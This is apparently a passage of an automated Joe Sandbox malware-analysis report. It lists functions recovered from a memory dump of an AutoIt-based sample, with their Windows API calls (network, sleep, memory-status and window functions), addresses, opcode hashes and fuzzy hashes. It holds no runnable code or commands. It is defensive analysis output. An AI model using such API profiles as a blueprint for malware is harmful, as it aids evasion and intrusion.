                                                                                                          • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00E806A3
                                                                                                          • ReleaseDC.USER32(?), ref: 00E806C4
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 2889604237-0
                                                                                                          • Opcode ID: 70e11ff160ade4df469c51f209128cc3ca1e85f8b71851748662e6d360e891ee
                                                                                                          • Instruction ID: adc84060f864476246cdd88ab9d044ba2b1c7ef9138bde7444ad1609451d4911
                                                                                                          • Opcode Fuzzy Hash: 70e11ff160ade4df469c51f209128cc3ca1e85f8b71851748662e6d360e891ee
                                                                                                          • Instruction Fuzzy Hash: 74E01AB1801204EFCB419F71E908B9D7FF1EB8C310F159406F86AB7A50DB3885559F50
                                                                                                          Function 00E8068D Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetDesktopWindow.USER32 ref: 00E8068D
                                                                                                          • GetDC.USER32(00000000), ref: 00E80697
                                                                                                          • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00E806A3
                                                                                                          • ReleaseDC.USER32(?), ref: 00E806C4
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 2889604237-0
                                                                                                          • Opcode ID: 0aa546e5dab05fe9c0804268efd0c29e0d1b832446d5312d8c023e61a2a65f4c
                                                                                                          • Instruction ID: 01b98b25c6de05edf2781cc05dbb831fcc895fbf6f8936d4ac71529459632ca1
                                                                                                          • Opcode Fuzzy Hash: 0aa546e5dab05fe9c0804268efd0c29e0d1b832446d5312d8c023e61a2a65f4c
                                                                                                          • Instruction Fuzzy Hash: 9BE012B1801204AFCB019FB2E908B9D7FF2EB8C320F14840AF96AB7650CB3895558F50
                                                                                                          Function 00EAB5EF Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00E5436A: _wcscpy.LIBCMT ref: 00E5438D
                                                                                                            • Part of subcall function 00E44D37: __itow.LIBCMT ref: 00E44D62
                                                                                                            • Part of subcall function 00E44D37: __swprintf.LIBCMT ref: 00E44DAC
                                                                                                          • __wcsnicmp.LIBCMT ref: 00EAB670
                                                                                                          • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 00EAB739
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                                                                          • String ID: LPT
                                                                                                          • API String ID: 3222508074-1350329615
                                                                                                          • Opcode ID: 1dafb97b234a379f9f8c2a716fe349cc47a3dc986cb9294f7d3bc848e2206acf
                                                                                                          • Instruction ID: 39df31aa58f2a2ea2856c7312b6cd432d0c7c9451e7c316a9fbab8d2027749a4
                                                                                                          • Opcode Fuzzy Hash: 1dafb97b234a379f9f8c2a716fe349cc47a3dc986cb9294f7d3bc848e2206acf
                                                                                                          • Instruction Fuzzy Hash: 2C617075A00219AFCB14DF94C891EAEB7F4EF49310F14915AF946BB392DB70AE44CB50
                                                                                                          Function 00E87190 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 148COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _memmove
                                                                                                          • String ID: #V
                                                                                                          • API String ID: 4104443479-3658881132
                                                                                                          • Opcode ID: 7473337403511ae8c326c84f5915331f82dfcfd4d2192143534b824c70dc5053
                                                                                                          • Instruction ID: 6400d1070a3562c546c3754f11a1c9d8589173ff0b2cd00780034e2cebc013a5
                                                                                                          • Opcode Fuzzy Hash: 7473337403511ae8c326c84f5915331f82dfcfd4d2192143534b824c70dc5053
                                                                                                          • Instruction Fuzzy Hash: 41517D70904609DFCF24DFA8C884AAEBBB0FF45308F24556AE89EE7250E731E955CB51
                                                                                                          Function 00E4E00D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • Sleep.KERNEL32(00000000), ref: 00E4E01E
                                                                                                          • GlobalMemoryStatusEx.KERNEL32(?), ref: 00E4E037
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: GlobalMemorySleepStatus
                                                                                                          • String ID: @
                                                                                                          • API String ID: 2783356886-2766056989
                                                                                                          • Opcode ID: 450d43c0e2cda0085f8679de72fec1fe01e838c8b08ad82c4167187a142f47ba
                                                                                                          • Instruction ID: ac3170cff9784b53f2a625ea18304b43ed68ede4fefc0c7768c8e08d0133b5f5
                                                                                                          • Opcode Fuzzy Hash: 450d43c0e2cda0085f8679de72fec1fe01e838c8b08ad82c4167187a142f47ba
                                                                                                          • Instruction Fuzzy Hash: AE518AB25087489BE320AF11EC86BAFBBF8FF84714F41484DF1D8611A1DB709428CB16
                                                                                                          Function 00EC8096 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SendMessageW.USER32(00000027,00001132,00000000,?), ref: 00EC8186
                                                                                                          • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00EC819B
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend
                                                                                                          • String ID: '
                                                                                                          • API String ID: 3850602802-1997036262
                                                                                                          • Opcode ID: d3618fa6c3b0adcae5f83b961539a5e473e9e0a98f4f21224364a496a0479456
                                                                                                          • Instruction ID: bcc692d42f750dc80247d74b64c05f77b071b0dd8aaecfd387c1f6c75d9e64d3
                                                                                                          • Opcode Fuzzy Hash: d3618fa6c3b0adcae5f83b961539a5e473e9e0a98f4f21224364a496a0479456
                                                                                                          • Instruction Fuzzy Hash: 12411774A012099FDB14CF64CA81FEA7BF5FB08300F14116EE904AB351DB31A956CF90
                                                                                                          Function 00EB2C5A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _memset.LIBCMT ref: 00EB2C6A
                                                                                                          • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00EB2CA0
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CrackInternet_memset
                                                                                                          • String ID: |
                                                                                                          • API String ID: 1413715105-2343686810
                                                                                                          • Opcode ID: 427a30911baec4a94f1754930a022817eb9e3edb144d15c486d9e294883a125a
                                                                                                          • Instruction ID: 293acd4a2551dd3b05e8bd5d60ab9ecb939f445d9c5747186c88412af1d8bbfd
                                                                                                          • Opcode Fuzzy Hash: 427a30911baec4a94f1754930a022817eb9e3edb144d15c486d9e294883a125a
                                                                                                          • Instruction Fuzzy Hash: 96311971C00119ABCF01EFA0DC85AEEBFB9FF08344F101059F915B6162DA315956DBA0
                                                                                                          Function 00EC7088 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • DestroyWindow.USER32(?,?,?,?), ref: 00EC713C
                                                                                                          • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00EC7178
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$DestroyMove
                                                                                                          • String ID: static
                                                                                                          • API String ID: 2139405536-2160076837
                                                                                                          • Opcode ID: 70fd368e49613a2431c20af84cc060e6e809825c01d9ba90e7ebf22decef9342
                                                                                                          • Instruction ID: 37a9a2ef7da597e68c4bed81cf30a509676d85fa51276bb379d2012c73457b75
                                                                                                          • Opcode Fuzzy Hash: 70fd368e49613a2431c20af84cc060e6e809825c01d9ba90e7ebf22decef9342
                                                                                                          • Instruction Fuzzy Hash: 56317E71100604AEDB109F74DC81FFB77A9FF88724F14A61DF9A5A7191DA31AC82DB60
                                                                                                          Function 00EA3049 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _memset.LIBCMT ref: 00EA30B8
                                                                                                          • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00EA30F3
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InfoItemMenu_memset
                                                                                                          • String ID: 0
                                                                                                          • API String ID: 2223754486-4108050209
                                                                                                          • Opcode ID: 724d045bed68f8c861504c4989337ca94521bf9ac4a1752877245da06f9a2337
                                                                                                          • Instruction ID: 1222ba6c811dfeeba932dd312177984d3950dbc3a9fe3583d28e5294620eca28
                                                                                                          • Opcode Fuzzy Hash: 724d045bed68f8c861504c4989337ca94521bf9ac4a1752877245da06f9a2337
                                                                                                          • Instruction Fuzzy Hash: 3131F7716013059BEB248F64D885BAEBBF8EF1A344F145019F881BA1A1D770AB44CB50
                                                                                                          Function 00EB40B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 84COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • __snwprintf.LIBCMT ref: 00EB4132
                                                                                                            • Part of subcall function 00E51A36: _memmove.LIBCMT ref: 00E51A77
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __snwprintf_memmove
                                                                                                          • String ID: , $$AUTOITCALLVARIABLE%d
                                                                                                          • API String ID: 3506404897-2584243854
                                                                                                          • Opcode ID: cdc24f27de6dbce60efe3591f77aeebbcd344e81d2957e03571b10f3923ac82e
                                                                                                          • Instruction ID: d8bea17b9a05e8d3932fba40376f2707f3a41309c4aff99cc3e29b7834e03024
                                                                                                          • Opcode Fuzzy Hash: cdc24f27de6dbce60efe3591f77aeebbcd344e81d2957e03571b10f3923ac82e
                                                                                                          • Instruction Fuzzy Hash: B22181B0A0021DABCF14EF64C891BEE77F5EF94341F441499F905BB282DB30AA45CBA1
                                                                                                          Function 00EC6CF9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00EC6D86
                                                                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00EC6D91
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend
                                                                                                          • String ID: Combobox
                                                                                                          • API String ID: 3850602802-2096851135
                                                                                                          • Opcode ID: 2bce93d82951d03a1af507c8e76a0651bf524537b878ff871060e9058d2ce775
                                                                                                          • Instruction ID: d33e9e639e5e39c1a95c6f50fa682dd38e0e22af4e6826140e00de6bbe995419
                                                                                                          • Opcode Fuzzy Hash: 2bce93d82951d03a1af507c8e76a0651bf524537b878ff871060e9058d2ce775
                                                                                                          • Instruction Fuzzy Hash: C811B671310208AFEF11AE54DD81FFB3B6AEB84368F115129F915AB291D6329C529760
                                                                                                          Function 00EC722C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00E42111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00E4214F
                                                                                                            • Part of subcall function 00E42111: GetStockObject.GDI32(00000011), ref: 00E42163
                                                                                                            • Part of subcall function 00E42111: SendMessageW.USER32(00000000,00000030,00000000), ref: 00E4216D
                                                                                                          • GetWindowRect.USER32(00000000,?), ref: 00EC7296
                                                                                                          • GetSysColor.USER32(00000012), ref: 00EC72B0
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                                          • String ID: static
                                                                                                          • API String ID: 1983116058-2160076837
                                                                                                          • Opcode ID: 6757ca4ef7d284c32c0c8071fed02162589810692b43525461b07d68f4f3ff83
                                                                                                          • Instruction ID: c47f8d3535f729ce6d1c68f7699f42b674d5de3f21189351940afe8117bab064
                                                                                                          • Opcode Fuzzy Hash: 6757ca4ef7d284c32c0c8071fed02162589810692b43525461b07d68f4f3ff83
                                                                                                          • Instruction Fuzzy Hash: 4021677261020AAFDB04DFB8DD46EFA7BA8EB08304F005519FD95E3250D635E8519B50
                                                                                                          Function 00EC6F45 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetWindowTextLengthW.USER32(00000000), ref: 00EC6FC7
                                                                                                          • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00EC6FD6
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: LengthMessageSendTextWindow
                                                                                                          • String ID: edit
                                                                                                          • API String ID: 2978978980-2167791130
                                                                                                          • Opcode ID: 7f6164a2b4543924296d6201284653cb51f4ad493e142ed13d87ababb1a1e89a
                                                                                                          • Instruction ID: cf11536f6ef1d206739d309060f344e10a8390c0b06a8da0abcb013e6cd1d4ad
                                                                                                          • Opcode Fuzzy Hash: 7f6164a2b4543924296d6201284653cb51f4ad493e142ed13d87ababb1a1e89a
                                                                                                          • Instruction Fuzzy Hash: 28116071600248AFEB105E64BD40FEB3BA9EB05368F10571CF964A71D0C776DC529760
                                                                                                          Function 00EA3156 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _memset.LIBCMT ref: 00EA31C9
                                                                                                          • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00EA31E8
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InfoItemMenu_memset
                                                                                                          • String ID: 0
                                                                                                          • API String ID: 2223754486-4108050209
                                                                                                          • Opcode ID: 8d50632c229c8b12999f9061b32fbffe7c43f42cd7d9515c78794a868cb61ac6
                                                                                                          • Instruction ID: 02831fd991300f4447bf4197641e9db28a0240f13c1b2a4209be9da0daec841a
                                                                                                          • Opcode Fuzzy Hash: 8d50632c229c8b12999f9061b32fbffe7c43f42cd7d9515c78794a868cb61ac6
                                                                                                          • Instruction Fuzzy Hash: 1F11D335D02218ABDB20EAA8DC45B9D77F8AB1F314F145162F805BB2A0D774BF05DB91
                                                                                                          Function 00E434E4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • DeleteObject.GDI32(?), ref: 00E4351D
                                                                                                          • DestroyWindow.USER32(?,?,00E54E61), ref: 00E43576
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: DeleteDestroyObjectWindow
                                                                                                          • String ID: h
                                                                                                          • API String ID: 2587070983-1717268160
                                                                                                          • Opcode ID: c57ae1d696ee1c6d7e9fe9e4546ae37c7defe5808a01b3a1573e6c6ee8668640
                                                                                                          • Instruction ID: 79cada1a4e639ecc621f8a01706c3e01105b77014ed507d72c9510a446c93aee
                                                                                                          • Opcode Fuzzy Hash: c57ae1d696ee1c6d7e9fe9e4546ae37c7defe5808a01b3a1573e6c6ee8668640
                                                                                                          • Instruction Fuzzy Hash: 40210070A093048FCB18FB29F95866533E1BB44315B25A199E406A72A5C724FE44EF51
                                                                                                          Function 00EB28A2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00EB28F8
                                                                                                          • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00EB2921
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
